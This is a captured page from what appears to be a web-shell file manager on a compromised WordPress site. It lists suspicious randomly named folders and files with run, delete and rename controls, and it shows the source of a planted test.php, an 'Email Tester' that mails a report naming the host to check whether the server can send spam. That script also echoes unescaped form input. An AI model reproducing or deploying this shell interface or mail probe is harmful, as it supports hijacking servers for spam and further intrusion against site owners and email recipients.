at path:
ROOT
/
test.php
run:
R
W
Run
.well-known
DIR
2026-06-09 13:40:27
R
W
Run
0ace7
DIR
2026-06-24 08:40:47
R
W
Run
2bcb8
DIR
2026-06-18 06:32:56
R
W
Run
85dd10
DIR
2026-06-01 06:53:05
R
W
Run
RIMURU
DIR
2026-06-25 11:21:34
R
W
Run
a92a91
DIR
2026-06-07 03:48:42
R
W
Run
c31bbe
DIR
2026-06-24 08:40:40
R
W
Run
wp-content
DIR
2026-05-27 04:18:45
R
W
Run
wp-includes
DIR
2026-06-24 08:40:40
R
W
Run
.htaccess
1.13 KB
2025-01-21 08:40:40
R
W
Run
db.php
11.4 KB
2026-06-22 12:57:00
R
W
Run
Delete
Rename
error_log
6.13 MB
2026-06-29 06:51:28
R
W
Run
Delete
Rename
filefuns.php
1.97 KB
2026-06-21 22:58:39
R
W
Run
Delete
Rename
robots.txt
431 By
2024-10-21 08:40:40
R
W
Run
test.php
737 By
2026-06-21 21:21:33
R
W
Run
Delete
Rename
unzip.php
0 By
2026-06-21 21:21:38
R
W
Run
Delete
Rename
error_log
up
📄
test.php
Save
<?php error_reporting(0); echo '<b>Email Tester [Sending test].<b><br><br><form method="post"> <input type="text" placeholder="email" name="email" value="'.$_POST['email'].'"> <input type="text" placeholder="ID" name="orderid" value="'.$_POST['orderid'].'"> <input type="submit" value="Send"> </form> <br>'; if (!empty($_POST['email'])) { if (!empty($_POST['email']) && trim($_POST['orderid']) != '') { $rand = trim($_POST['orderid']); } else { $rand = rand(); } mail(trim($_POST['email']),$_SERVER['HTTP_HOST']." - Sending is Working Fine. [Result] ID: (".$rand.")"," [Sending test]."); echo '<b>Send an report to ['.$_POST['email'].'] - ID: '.$rand.'</b>'; echo '<!-- <id>'.$rand.'</id> -->'; } ?>